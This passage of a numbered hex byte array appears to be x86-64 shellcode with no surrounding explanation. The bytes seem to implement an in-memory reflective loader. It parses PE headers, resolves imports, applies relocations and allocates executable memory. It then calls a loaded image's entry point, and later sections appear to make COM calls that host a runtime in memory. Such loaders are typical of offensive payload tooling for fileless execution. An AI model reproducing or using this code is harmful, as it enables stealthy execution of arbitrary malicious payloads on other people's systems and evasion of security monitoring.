546 0x00, 0x01, 0x48, 0x8b, 0x85, 0xf0, 0x00, 0x00, 0x00, 0x0f, 0xb7, 0x40,
547 0x06, 0x0f, 0xb7, 0xc0, 0x3b, 0x85, 0x24, 0x01, 0x00, 0x00, 0x0f, 0x87,
548 0x4c, 0xff, 0xff, 0xff, 0x48, 0x8b, 0x85, 0xf0, 0x00, 0x00, 0x00, 0x8b,
549 0x80, 0x90, 0x00, 0x00, 0x00, 0x89, 0x85, 0xcc, 0x00, 0x00, 0x00, 0x8b,
550 0x95, 0xcc, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x85, 0x08, 0x01, 0x00, 0x00,
551 0x48, 0x01, 0xd0, 0x48, 0x89, 0x85, 0x38, 0x01, 0x00, 0x00, 0xe9, 0x39,
552 0x01, 0x00, 0x00, 0x48, 0x8b, 0x85, 0x38, 0x01, 0x00, 0x00, 0x8b, 0x40,
553 0x0c, 0x89, 0xc2, 0x48, 0x8b, 0x85, 0x08, 0x01, 0x00, 0x00, 0x48, 0x01,
554 0xd0, 0x48, 0x89, 0x85, 0xc0, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x85, 0x60,
555 0x01, 0x00, 0x00, 0x48, 0x8b, 0x40, 0x30, 0x48, 0x8b, 0x95, 0xc0, 0x00,
556 0x00, 0x00, 0x48, 0x89, 0xd1, 0xff, 0xd0, 0x48, 0x89, 0x85, 0xb8, 0x00,
557 0x00, 0x00, 0x48, 0x8b, 0x85, 0x38, 0x01, 0x00, 0x00, 0x8b, 0x00, 0x89,
558 0xc2, 0x48, 0x8b, 0x85, 0x08, 0x01, 0x00, 0x00, 0x48, 0x01, 0xd0, 0x48,
559 0x89, 0x85, 0x48, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x85, 0x38, 0x01, 0x00,
560 0x00, 0x8b, 0x40, 0x10, 0x89, 0xc2, 0x48, 0x8b, 0x85, 0x08, 0x01, 0x00,
561 0x00, 0x48, 0x01, 0xd0, 0x48, 0x89, 0x85, 0x40, 0x01, 0x00, 0x00, 0x48,
562 0x8b, 0x85, 0x48, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x00, 0x48, 0x85, 0xc0,
563 0x0f, 0x84, 0xa9, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x85, 0x40, 0x01, 0x00,
564 0x00, 0x48, 0x89, 0x85, 0xb0, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x85, 0x48,
565 0x01, 0x00, 0x00, 0x48, 0x8b, 0x00, 0x48, 0x85, 0xc0, 0x79, 0x30, 0x48,
566 0x8b, 0x85, 0x60, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x40, 0x38, 0x48, 0x8b,
567 0x95, 0x48, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x12, 0x0f, 0xb7, 0xd2, 0x48,
568 0x8b, 0x8d, 0xb8, 0x00, 0x00, 0x00, 0xff, 0xd0, 0x48, 0x89, 0xc2, 0x48,
569 0x8b, 0x85, 0xb0, 0x00, 0x00, 0x00, 0x48, 0x89, 0x10, 0xeb, 0x47, 0x48,
570 0x8b, 0x85, 0x48, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x10, 0x48, 0x8b, 0x85,
571 0x08, 0x01, 0x00, 0x00, 0x48, 0x01, 0xd0, 0x48, 0x89, 0x85, 0xa8, 0x00,
572 0x00, 0x00, 0x48, 0x8b, 0x85, 0x60, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x40,
573 0x38, 0x48, 0x8b, 0x95, 0xa8, 0x00, 0x00, 0x00, 0x48, 0x83, 0xc2, 0x02,
574 0x48, 0x8b, 0x8d, 0xb8, 0x00, 0x00, 0x00, 0xff, 0xd0, 0x48, 0x89, 0xc2,
575 0x48, 0x8b, 0x85, 0xb0, 0x00, 0x00, 0x00, 0x48, 0x89, 0x10, 0x48, 0x83,
576 0x85, 0x48, 0x01, 0x00, 0x00, 0x08, 0x48, 0x83, 0x85, 0x40, 0x01, 0x00,
577 0x00, 0x08, 0xe9, 0x44, 0xff, 0xff, 0xff, 0x90, 0x48, 0x83, 0x85, 0x38,
578 0x01, 0x00, 0x00, 0x14, 0x48, 0x8b, 0x85, 0x38, 0x01, 0x00, 0x00, 0x8b,
579 0x40, 0x0c, 0x85, 0xc0, 0x0f, 0x85, 0xb5, 0xfe, 0xff, 0xff, 0x48, 0x8b,
580 0x85, 0xf0, 0x00, 0x00, 0x00, 0x8b, 0x80, 0xb0, 0x00, 0x00, 0x00, 0x89,
581 0x85, 0xcc, 0x00, 0x00, 0x00, 0x8b, 0x95, 0xcc, 0x00, 0x00, 0x00, 0x48,
582 0x8b, 0x85, 0x08, 0x01, 0x00, 0x00, 0x48, 0x01, 0xd0, 0x48, 0x89, 0x85,
583 0x28, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x85, 0xf0, 0x00, 0x00, 0x00, 0x48,
584 0x8b, 0x40, 0x30, 0x48, 0xf7, 0xd8, 0x48, 0x89, 0xc2, 0x48, 0x8b, 0x85,
585 0x08, 0x01, 0x00, 0x00, 0x48, 0x01, 0xd0, 0x48, 0x89, 0x85, 0xa0, 0x00,
586 0x00, 0x00, 0xe9, 0xdc, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x85, 0x28, 0x01,
587 0x00, 0x00, 0x48, 0x83, 0xc0, 0x08, 0x48, 0x89, 0x85, 0x30, 0x01, 0x00,
588 0x00, 0xe9, 0x94, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x85, 0x30, 0x01, 0x00,
589 0x00, 0x0f, 0xb6, 0x40, 0x01, 0x83, 0xe0, 0xf0, 0x3c, 0xa0, 0x75, 0x64,
590 0x48, 0x8b, 0x85, 0x28, 0x01, 0x00, 0x00, 0x8b, 0x00, 0x89, 0xc2, 0x48,
591 0x8b, 0x85, 0x30, 0x01, 0x00, 0x00, 0x0f, 0xb7, 0x00, 0x66, 0x25, 0xff,
592 0x0f, 0x0f, 0xb7, 0xc0, 0x48, 0x01, 0xc2, 0x48, 0x8b, 0x85, 0x08, 0x01,
593 0x00, 0x00, 0x48, 0x01, 0xc2, 0x48, 0x8b, 0x85, 0x28, 0x01, 0x00, 0x00,
594 0x8b, 0x00, 0x89, 0xc1, 0x48, 0x8b, 0x85, 0x30, 0x01, 0x00, 0x00, 0x0f,
595 0xb7, 0x00, 0x66, 0x25, 0xff, 0x0f, 0x0f, 0xb7, 0xc0, 0x48, 0x01, 0xc1,
596 0x48, 0x8b, 0x85, 0x08, 0x01, 0x00, 0x00, 0x48, 0x01, 0xc8, 0x48, 0x8b,
597 0x08, 0x48, 0x8b, 0x85, 0xa0, 0x00, 0x00, 0x00, 0x48, 0x01, 0xc8, 0x48,
598 0x89, 0x02, 0xeb, 0x16, 0x48, 0x8b, 0x85, 0x30, 0x01, 0x00, 0x00, 0x0f,
599 0xb6, 0x40, 0x01, 0x83, 0xe0, 0xf0, 0x84, 0xc0, 0x0f, 0x85, 0xd9, 0x02,
600 0x00, 0x00, 0x48, 0x83, 0x85, 0x30, 0x01, 0x00, 0x00, 0x02, 0x48, 0x8b,
601 0x85, 0x28, 0x01, 0x00, 0x00, 0x8b, 0x40, 0x04, 0x89, 0xc2, 0x48, 0x8b,
602 0x85, 0x28, 0x01, 0x00, 0x00, 0x48, 0x01, 0xd0, 0x48, 0x3b, 0x85, 0x30,
603 0x01, 0x00, 0x00, 0x0f, 0x85, 0x49, 0xff, 0xff, 0xff, 0x48, 0x8b, 0x85,
604 0x30, 0x01, 0x00, 0x00, 0x48, 0x89, 0x85, 0x28, 0x01, 0x00, 0x00, 0x48,
605 0x8b, 0x85, 0x28, 0x01, 0x00, 0x00, 0x8b, 0x00, 0x85, 0xc0, 0x0f, 0x85,
606 0x13, 0xff, 0xff, 0xff, 0x48, 0x8b, 0x85, 0x18, 0x01, 0x00, 0x00, 0x8b,
607 0x00, 0x83, 0xf8, 0x03, 0x0f, 0x85, 0x5b, 0x02, 0x00, 0x00, 0x48, 0x8b,
608 0x85, 0x18, 0x01, 0x00, 0x00, 0x0f, 0xb7, 0x80, 0x04, 0x06, 0x00, 0x00,
609 0x66, 0x85, 0xc0, 0x0f, 0x84, 0x10, 0x02, 0x00, 0x00, 0x48, 0x8b, 0x85,
610 0xf0, 0x00, 0x00, 0x00, 0x8b, 0x80, 0x88, 0x00, 0x00, 0x00, 0x89, 0x85,
611 0xcc, 0x00, 0x00, 0x00, 0x83, 0xbd, 0xcc, 0x00, 0x00, 0x00, 0x00, 0x0f,
612 0x84, 0x4a, 0x02, 0x00, 0x00, 0x8b, 0x95, 0xcc, 0x00, 0x00, 0x00, 0x48,
613 0x8b, 0x85, 0x08, 0x01, 0x00, 0x00, 0x48, 0x01, 0xd0, 0x48, 0x89, 0x85,
614 0x98, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x85, 0x98, 0x00, 0x00, 0x00, 0x8b,
615 0x40, 0x18, 0x89, 0x85, 0x20, 0x01, 0x00, 0x00, 0x83, 0xbd, 0x20, 0x01,
616 0x00, 0x00, 0x00, 0x0f, 0x84, 0x16, 0x02, 0x00, 0x00, 0x48, 0x8b, 0x85,
617 0x98, 0x00, 0x00, 0x00, 0x8b, 0x40, 0x1c, 0x89, 0xc2, 0x48, 0x8b, 0x85,
618 0x08, 0x01, 0x00, 0x00, 0x48, 0x01, 0xd0, 0x48, 0x89, 0x85, 0x90, 0x00,
619 0x00, 0x00, 0x48, 0x8b, 0x85, 0x98, 0x00, 0x00, 0x00, 0x8b, 0x40, 0x20,
620 0x89, 0xc2, 0x48, 0x8b, 0x85, 0x08, 0x01, 0x00, 0x00, 0x48, 0x01, 0xd0,
621 0x48, 0x89, 0x85, 0x88, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x85, 0x98, 0x00,
622 0x00, 0x00, 0x8b, 0x40, 0x24, 0x89, 0xc2, 0x48, 0x8b, 0x85, 0x08, 0x01,
623 0x00, 0x00, 0x48, 0x01, 0xd0, 0x48, 0x89, 0x85, 0x80, 0x00, 0x00, 0x00,
624 0x8b, 0x85, 0x20, 0x01, 0x00, 0x00, 0x83, 0xe8, 0x01, 0x89, 0xc0, 0x48,
625 0x8d, 0x14, 0x85, 0x00, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x85, 0x88, 0x00,
626 0x00, 0x00, 0x48, 0x01, 0xd0, 0x8b, 0x00, 0x89, 0xc2, 0x48, 0x8b, 0x85,
627 0x08, 0x01, 0x00, 0x00, 0x48, 0x01, 0xd0, 0x48, 0x89, 0x45, 0x78, 0x48,
628 0x8b, 0x85, 0x18, 0x01, 0x00, 0x00, 0x48, 0x8d, 0x90, 0x04, 0x06, 0x00,
629 0x00, 0x48, 0x8b, 0x45, 0x78, 0x48, 0x89, 0xc1, 0xe8, 0x5a, 0xf8, 0xff,
630 0xff, 0x85, 0xc0, 0x75, 0x48, 0x8b, 0x85, 0x20, 0x01, 0x00, 0x00, 0x83,
631 0xe8, 0x01, 0x89, 0xc0, 0x48, 0x8d, 0x14, 0x00, 0x48, 0x8b, 0x85, 0x80,
632 0x00, 0x00, 0x00, 0x48, 0x01, 0xd0, 0x0f, 0xb7, 0x00, 0x0f, 0xb7, 0xc0,
633 0x48, 0x8d, 0x14, 0x85, 0x00, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x85, 0x90,
634 0x00, 0x00, 0x00, 0x48, 0x01, 0xd0, 0x8b, 0x00, 0x89, 0xc2, 0x48, 0x8b,
635 0x85, 0x08, 0x01, 0x00, 0x00, 0x48, 0x01, 0xd0, 0x48, 0x89, 0x85, 0x10,
636 0x01, 0x00, 0x00, 0xeb, 0x14, 0x83, 0xad, 0x20, 0x01, 0x00, 0x00, 0x01,
637 0x83, 0xbd, 0x20, 0x01, 0x00, 0x00, 0x00, 0x0f, 0x85, 0x57, 0xff, 0xff,
638 0xff, 0x48, 0x83, 0xbd, 0x10, 0x01, 0x00, 0x00, 0x00, 0x0f, 0x84, 0x07,
639 0x01, 0x00, 0x00, 0x48, 0x8b, 0x85, 0x60, 0x01, 0x00, 0x00, 0x48, 0x8b,
640 0x40, 0x48, 0x41, 0xb9, 0x40, 0x00, 0x00, 0x00, 0x41, 0xb8, 0x00, 0x30,
641 0x00, 0x00, 0xba, 0xbc, 0x00, 0x00, 0x00, 0xb9, 0x00, 0x00, 0x00, 0x00,
642 0xff, 0xd0, 0x48, 0x89, 0x45, 0x70, 0x48, 0x83, 0x7d, 0x70, 0x00, 0x0f,
643 0x84, 0xd6, 0x00, 0x00, 0x00, 0x48, 0x8d, 0x55, 0xa0, 0x48, 0x8b, 0x45,
644 0x70, 0x41, 0xb8, 0xbc, 0x00, 0x00, 0x00, 0x48, 0x89, 0xc1, 0xe8, 0xa1,
645 0x1b, 0x00, 0x00, 0x48, 0x8b, 0x85, 0x18, 0x01, 0x00, 0x00, 0x48, 0x8d,
646 0x90, 0x08, 0x08, 0x00, 0x00, 0x48, 0x8b, 0x85, 0x18, 0x01, 0x00, 0x00,
647 0x8b, 0x80, 0x04, 0x08, 0x00, 0x00, 0x41, 0x89, 0xc1, 0x48, 0x8b, 0x8d,
648 0x10, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x45, 0x70, 0x49, 0x89, 0xd0, 0x44,
649 0x89, 0xca, 0xff, 0xd0, 0x48, 0x8b, 0x45, 0x70, 0x41, 0xb8, 0xbc, 0x00,
650 0x00, 0x00, 0xba, 0x00, 0x00, 0x00, 0x00, 0x48, 0x89, 0xc1, 0xe8, 0x11,
651 0x1b, 0x00, 0x00, 0x48, 0x8b, 0x85, 0x60, 0x01, 0x00, 0x00, 0x48, 0x8b,
652 0x40, 0x50, 0x48, 0x8b, 0x4d, 0x70, 0x41, 0xb8, 0x00, 0xc0, 0x00, 0x00,
653 0xba, 0x00, 0x00, 0x00, 0x00, 0xff, 0xd0, 0xeb, 0x5a, 0x48, 0x8b, 0x85,
654 0xf0, 0x00, 0x00, 0x00, 0x8b, 0x40, 0x28, 0x89, 0xc2, 0x48, 0x8b, 0x85,
655 0x08, 0x01, 0x00, 0x00, 0x48, 0x01, 0xd0, 0x48, 0x89, 0x45, 0x68, 0x48,
656 0x8b, 0x8d, 0xe8, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x45, 0x68, 0x41, 0xb8,
657 0x00, 0x00, 0x00, 0x00, 0xba, 0x01, 0x00, 0x00, 0x00, 0xff, 0xd0, 0xeb,
658 0x26, 0x48, 0x8b, 0x85, 0xf0, 0x00, 0x00, 0x00, 0x8b, 0x40, 0x28, 0x89,
659 0xc2, 0x48, 0x8b, 0x85, 0x08, 0x01, 0x00, 0x00, 0x48, 0x01, 0xd0, 0x48,
660 0x89, 0x45, 0x60, 0x48, 0x8b, 0x45, 0x60, 0xff, 0xd0, 0xeb, 0x04, 0x90,
661 0xeb, 0x01, 0x90, 0x48, 0x83, 0xbd, 0x08, 0x01, 0x00, 0x00, 0x00, 0x74,
662 0x25, 0x48, 0x8b, 0x85, 0x60, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x40, 0x50,
663 0x48, 0x8b, 0x8d, 0x08, 0x01, 0x00, 0x00, 0x41, 0xb8, 0x00, 0xc0, 0x00,
664 0x00, 0xba, 0x00, 0x00, 0x00, 0x00, 0xff, 0xd0, 0xeb, 0x04, 0x90, 0xeb,
665 0x01, 0x90, 0x48, 0x81, 0xc4, 0xd0, 0x01, 0x00, 0x00, 0x5d, 0xc3, 0x55,
666 0x48, 0x89, 0xe5, 0x48, 0x83, 0xec, 0x70, 0x48, 0x89, 0x4d, 0x10, 0x48,
667 0x8b, 0x45, 0x10, 0x8b, 0x80, 0x0c, 0x05, 0x00, 0x00, 0x83, 0xf8, 0x01,
668 0x75, 0x10, 0x48, 0x8b, 0x45, 0x10, 0x48, 0x05, 0x48, 0x07, 0x00, 0x00,
669 0x48, 0x89, 0x45, 0xf8, 0xeb, 0x0f, 0x48, 0x8b, 0x45, 0x10, 0x48, 0x8b,
670 0x80, 0x48, 0x07, 0x00, 0x00, 0x48, 0x89, 0x45, 0xf8, 0x48, 0x8b, 0x45,
671 0x10, 0x48, 0x8b, 0x40, 0x48, 0x48, 0x8b, 0x55, 0x10, 0x48, 0x8b, 0x92,
672 0x40, 0x07, 0x00, 0x00, 0x48, 0x83, 0xc2, 0x01, 0x48, 0x01, 0xd2, 0x41,
673 0xb9, 0x04, 0x00, 0x00, 0x00, 0x41, 0xb8, 0x00, 0x30, 0x00, 0x00, 0xb9,
674 0x00, 0x00, 0x00, 0x00, 0xff, 0xd0, 0x48, 0x89, 0x45, 0xf0, 0x48, 0x83,
675 0x7d, 0xf0, 0x00, 0x0f, 0x84, 0x9b, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x45,
676 0x10, 0x48, 0x8b, 0x40, 0x70, 0x48, 0x8b, 0x55, 0xf8, 0x48, 0x8b, 0x92,
677 0x10, 0x19, 0x00, 0x00, 0x01, 0xd2, 0x41, 0x89, 0xd0, 0x48, 0x8b, 0x55,
678 0xf8, 0x48, 0x8d, 0x8a, 0x18, 0x19, 0x00, 0x00, 0x44, 0x89, 0x44, 0x24,
679 0x28, 0x48, 0x8b, 0x55, 0xf0, 0x48, 0x89, 0x54, 0x24, 0x20, 0x41, 0xb9,
680 0xff, 0xff, 0xff, 0xff, 0x49, 0x89, 0xc8, 0xba, 0x00, 0x00, 0x00, 0x00,
681 0xb9, 0x00, 0x00, 0x00, 0x00, 0xff, 0xd0, 0x48, 0x8b, 0x45, 0x10, 0x48,
682 0x8b, 0x80, 0x20, 0x01, 0x00, 0x00, 0xba, 0x00, 0x00, 0x00, 0x00, 0xb9,
683 0x00, 0x00, 0x00, 0x00, 0xff, 0xd0, 0x89, 0x45, 0xec, 0x83, 0x7d, 0xec,
684 0x00, 0x0f, 0x85, 0xf1, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x45, 0x10, 0x48,
685 0x8b, 0x80, 0x28, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x55, 0x10, 0x4c, 0x8d,
686 0x82, 0xec, 0x04, 0x00, 0x00, 0x48, 0x8b, 0x55, 0x10, 0x48, 0x8d, 0x8a,
687 0xdc, 0x04, 0x00, 0x00, 0x48, 0x8d, 0x55, 0xe0, 0x48, 0x89, 0x54, 0x24,
688 0x20, 0x4d, 0x89, 0xc1, 0x41, 0xb8, 0x01, 0x00, 0x00, 0x00, 0xba, 0x00,
689 0x00, 0x00, 0x00, 0xff, 0xd0, 0x89, 0x45, 0xec, 0x83, 0x7d, 0xec, 0x00,
690 0x0f, 0x85, 0x9d, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x45, 0xe0, 0x48, 0x8b,
691 0x00, 0x48, 0x8b, 0x80, 0x08, 0x02, 0x00, 0x00, 0x48, 0x8b, 0x4d, 0xe0,
692 0x4c, 0x8d, 0x45, 0xd6, 0x48, 0x8b, 0x55, 0xf0, 0xff, 0xd0, 0x89, 0x45,
693 0xec, 0x83, 0x7d, 0xec, 0x00, 0x75, 0x64, 0x0f, 0xb7, 0x45, 0xd6, 0x66,
694 0x85, 0xc0, 0x74, 0x5b, 0x48, 0x8b, 0x45, 0xe0, 0x48, 0x8b, 0x00, 0x48,
695 0x8b, 0x00, 0x48, 0x8b, 0x55, 0x10, 0x48, 0x81, 0xc2, 0xfc, 0x04, 0x00,
696 0x00, 0x48, 0x8b, 0x4d, 0xe0, 0x4c, 0x8d, 0x45, 0xd8, 0xff, 0xd0, 0x89,
697 0x45, 0xec, 0x83, 0x7d, 0xec, 0x00, 0x75, 0x33, 0x48, 0x8b, 0x45, 0xe0,
698 0x48, 0x8b, 0x00, 0x48, 0x8b, 0x80, 0x18, 0x01, 0x00, 0x00, 0x48, 0x8b,
699 0x55, 0xd8, 0x48, 0x8b, 0x4d, 0xe0, 0x4c, 0x8d, 0x45, 0xc8, 0xff, 0xd0,
700 0x89, 0x45, 0xec, 0x48, 0x8b, 0x45, 0xd8, 0x48, 0x8b, 0x00, 0x48, 0x8b,
701 0x40, 0x10, 0x48, 0x8b, 0x55, 0xd8, 0x48, 0x89, 0xd1, 0xff, 0xd0, 0x48,
702 0x8b, 0x45, 0xe0, 0x48, 0x8b, 0x00, 0x48, 0x8b, 0x40, 0x10, 0x48, 0x8b,
703 0x55, 0xe0, 0x48, 0x89, 0xd1, 0xff, 0xd0, 0x48, 0x8b, 0x45, 0x10, 0x48,
704 0x8b, 0x80, 0x30, 0x01, 0x00, 0x00, 0xff, 0xd0, 0x48, 0x8b, 0x45, 0x10,
705 0x48, 0x8b, 0x80, 0x40, 0x07, 0x00, 0x00, 0x48, 0x83, 0xc0, 0x01, 0x48,
706 0x8d, 0x14, 0x00, 0x48, 0x8b, 0x45, 0xf0, 0x49, 0x89, 0xd0, 0xba, 0x00,
707 0x00, 0x00, 0x00, 0x48, 0x89, 0xc1, 0xe8, 0x69, 0x18, 0x00, 0x00, 0x48,
708 0x8b, 0x45, 0x10, 0x48, 0x8b, 0x40, 0x50, 0x48, 0x8b, 0x4d, 0xf0, 0x41,
709 0xb8, 0x00, 0xc0, 0x00, 0x00, 0xba, 0x00, 0x00, 0x00, 0x00, 0xff, 0xd0,
710 0x90, 0x48, 0x83, 0xc4, 0x70, 0x5d, 0xc3, 0x55, 0x48, 0x81, 0xec, 0x30,
711 0x02, 0x00, 0x00, 0x48, 0x8d, 0xac, 0x24, 0x80, 0x00, 0x00, 0x00, 0x48,
712 0x89, 0x8d, 0xc0, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x85, 0xc0, 0x01, 0x00,
713 0x00, 0x8b, 0x80, 0x0c, 0x05, 0x00, 0x00, 0x83, 0xf8, 0x01, 0x75, 0x16,
714 0x48, 0x8b, 0x85, 0xc0, 0x01, 0x00, 0x00, 0x48, 0x05, 0x48, 0x07, 0x00,
715 0x00, 0x48, 0x89, 0x85, 0xa8, 0x01, 0x00, 0x00, 0xeb, 0x15, 0x48, 0x8b,
716 0x85, 0xc0, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x80, 0x48, 0x07, 0x00, 0x00,
717 0x48, 0x89, 0x85, 0xa8, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x85, 0xc0, 0x01,
718 0x00, 0x00, 0x48, 0x8b, 0x40, 0x48, 0x48, 0x8b, 0x95, 0xc0, 0x01, 0x00,
719 0x00, 0x48, 0x8b, 0x92, 0x40, 0x07, 0x00, 0x00, 0x48, 0x83, 0xc2, 0x01,
720 0x48, 0x01, 0xd2, 0x41, 0xb9, 0x04, 0x00, 0x00, 0x00, 0x41, 0xb8, 0x00,
721 0x30, 0x00, 0x00, 0xb9, 0x00, 0x00, 0x00, 0x00, 0xff, 0xd0, 0x48, 0x89,
722 0x85, 0xa0, 0x01, 0x00, 0x00, 0x48, 0x83, 0xbd, 0xa0, 0x01, 0x00, 0x00,
723 0x00, 0x0f, 0x84, 0x78, 0x03, 0x00, 0x00, 0x48, 0x8b, 0x85, 0xc0, 0x01,
724 0x00, 0x00, 0x48, 0x8b, 0x40, 0x70, 0x48, 0x8b, 0x95, 0xa8, 0x01, 0x00,
725 0x00, 0x48, 0x8b, 0x92, 0x10, 0x19, 0x00, 0x00, 0x01, 0xd2, 0x41, 0x89,
726 0xd0, 0x48, 0x8b, 0x95, 0xa8, 0x01, 0x00, 0x00, 0x48, 0x8d, 0x8a, 0x18,
727 0x19, 0x00, 0x00, 0x44, 0x89, 0x44, 0x24, 0x28, 0x48, 0x8b, 0x95, 0xa0,
728 0x01, 0x00, 0x00, 0x48, 0x89, 0x54, 0x24, 0x20, 0x41, 0xb9, 0xff, 0xff,
729 0xff, 0xff, 0x49, 0x89, 0xc8, 0xba, 0x00, 0x00, 0x00, 0x00, 0xb9, 0x00,
730 0x00, 0x00, 0x00, 0xff, 0xd0, 0x48, 0x8d, 0x85, 0xc0, 0x00, 0x00, 0x00,
731 0x48, 0x89, 0x85, 0x20, 0x01, 0x00, 0x00, 0x48, 0x8d, 0x85, 0x20, 0x01,
732 0x00, 0x00, 0x48, 0x89, 0xc2, 0x48, 0x8b, 0x8d, 0xc0, 0x01, 0x00, 0x00,
733 0xe8, 0x0c, 0x03, 0x00, 0x00, 0x48, 0x8d, 0x45, 0xd0, 0x48, 0x89, 0x85,
734 0x38, 0x01, 0x00, 0x00, 0x48, 0x8d, 0x85, 0x20, 0x01, 0x00, 0x00, 0x48,
735 0x83, 0xc0, 0x18, 0x48, 0x89, 0xc2, 0x48, 0x8b, 0x8d, 0xc0, 0x01, 0x00,
736 0x00, 0xe8, 0xc8, 0x06, 0x00, 0x00, 0x48, 0xc7, 0x85, 0x30, 0x01, 0x00,
737 0x00, 0x00, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x85, 0xc0, 0x01, 0x00, 0x00,
738 0x48, 0x8b, 0x80, 0x20, 0x01, 0x00, 0x00, 0xba, 0x00, 0x00, 0x00, 0x00,
739 0xb9, 0x00, 0x00, 0x00, 0x00, 0xff, 0xd0, 0x89, 0x85, 0x9c, 0x01, 0x00,
740 0x00, 0x83, 0xbd, 0x9c, 0x01, 0x00, 0x00, 0x00, 0x0f, 0x85, 0x59, 0x02,
741 0x00, 0x00, 0x48, 0x8b, 0x85, 0xc0, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x80,
742 0x28, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x95, 0xc0, 0x01, 0x00, 0x00, 0x4c,
743 0x8d, 0x82, 0x9c, 0x04, 0x00, 0x00, 0x48, 0x8b, 0x95, 0xc0, 0x01, 0x00,
744 0x00, 0x48, 0x8d, 0x8a, 0x7c, 0x04, 0x00, 0x00, 0x48, 0x8d, 0x95, 0x80,
745 0x01, 0x00, 0x00, 0x48, 0x89, 0x54, 0x24, 0x20, 0x4d, 0x89, 0xc1, 0x41,
746 0xb8, 0x03, 0x00, 0x00, 0x00, 0xba, 0x00, 0x00, 0x00, 0x00, 0xff, 0xd0,
747 0x89, 0x85, 0x9c, 0x01, 0x00, 0x00, 0x83, 0xbd, 0x9c, 0x01, 0x00, 0x00,
748 0x00, 0x0f, 0x85, 0x00, 0x02, 0x00, 0x00, 0x48, 0x8b, 0x85, 0x80, 0x01,
749 0x00, 0x00, 0x48, 0x8b, 0x00, 0x48, 0x8b, 0x00, 0x48, 0x8b, 0x95, 0xc0,
750 0x01, 0x00, 0x00, 0x48, 0x81, 0xc2, 0xcc, 0x04, 0x00, 0x00, 0x48, 0x8b,
751 0x8d, 0x80, 0x01, 0x00, 0x00, 0x4c, 0x8d, 0x85, 0x88, 0x01, 0x00, 0x00,
752 0xff, 0xd0, 0x89, 0x85, 0x9c, 0x01, 0x00, 0x00, 0x83, 0xbd, 0x9c, 0x01,
753 0x00, 0x00, 0x00, 0x0f, 0x85, 0x8e, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x85,
754 0x88, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x00, 0x48, 0x8b, 0x40, 0x18, 0x48,
755 0x8b, 0x95, 0x88, 0x01, 0x00, 0x00, 0x48, 0x89, 0xd1, 0xff, 0xd0, 0x89,
756 0x85, 0x9c, 0x01, 0x00, 0x00, 0x83, 0xbd, 0x9c, 0x01, 0x00, 0x00, 0x00,
757 0x0f, 0x85, 0x47, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x85, 0x80, 0x01, 0x00,
758 0x00, 0x48, 0x89, 0x85, 0x50, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x85, 0x80,
759 0x01, 0x00, 0x00, 0x48, 0x8b, 0x00, 0x48, 0x8b, 0x40, 0x18, 0x48, 0x8b,
760 0x8d, 0x80, 0x01, 0x00, 0x00, 0x48, 0x8d, 0x95, 0x20, 0x01, 0x00, 0x00,
761 0xff, 0xd0, 0x89, 0x85, 0x9c, 0x01, 0x00, 0x00, 0x83, 0xbd, 0x9c, 0x01,
762 0x00, 0x00, 0x00, 0x0f, 0x85, 0x08, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x85,
763 0xc0, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x80, 0xb0, 0x00, 0x00, 0x00, 0x48,
764 0x8b, 0x95, 0xc0, 0x01, 0x00, 0x00, 0x48, 0x81, 0xc2, 0xcc, 0x03, 0x00,
765 0x00, 0x48, 0x89, 0xd1, 0xff, 0xd0, 0x48, 0x89, 0x85, 0x90, 0x01, 0x00,
766 0x00, 0x48, 0x8b, 0x85, 0x80, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x00, 0x48,
767 0x8b, 0x40, 0x40, 0x48, 0x8b, 0x8d, 0x80, 0x01, 0x00, 0x00, 0x48, 0x8b,
768 0x95, 0x90, 0x01, 0x00, 0x00, 0x41, 0xb8, 0x02, 0x00, 0x00, 0x00, 0xff,
769 0xd0, 0x89, 0x85, 0x9c, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x85, 0xc0, 0x01,
770 0x00, 0x00, 0x48, 0x8b, 0x80, 0xb8, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x95,
771 0x90, 0x01, 0x00, 0x00, 0x48, 0x89, 0xd1, 0xff, 0xd0, 0x83, 0xbd, 0x9c,
772 0x01, 0x00, 0x00, 0x00, 0x0f, 0x85, 0x8f, 0x00, 0x00, 0x00, 0x48, 0x8b,
773 0x85, 0x88, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x00, 0x48, 0x8b, 0x40, 0x28,
774 0x48, 0x8b, 0x8d, 0x88, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x95, 0xa0, 0x01,
775 0x00, 0x00, 0x48, 0xc7, 0x44, 0x24, 0x48, 0x00, 0x00, 0x00, 0x00, 0x48,
776 0xc7, 0x44, 0x24, 0x40, 0x00, 0x00, 0x00, 0x00, 0xc7, 0x44, 0x24, 0x38,
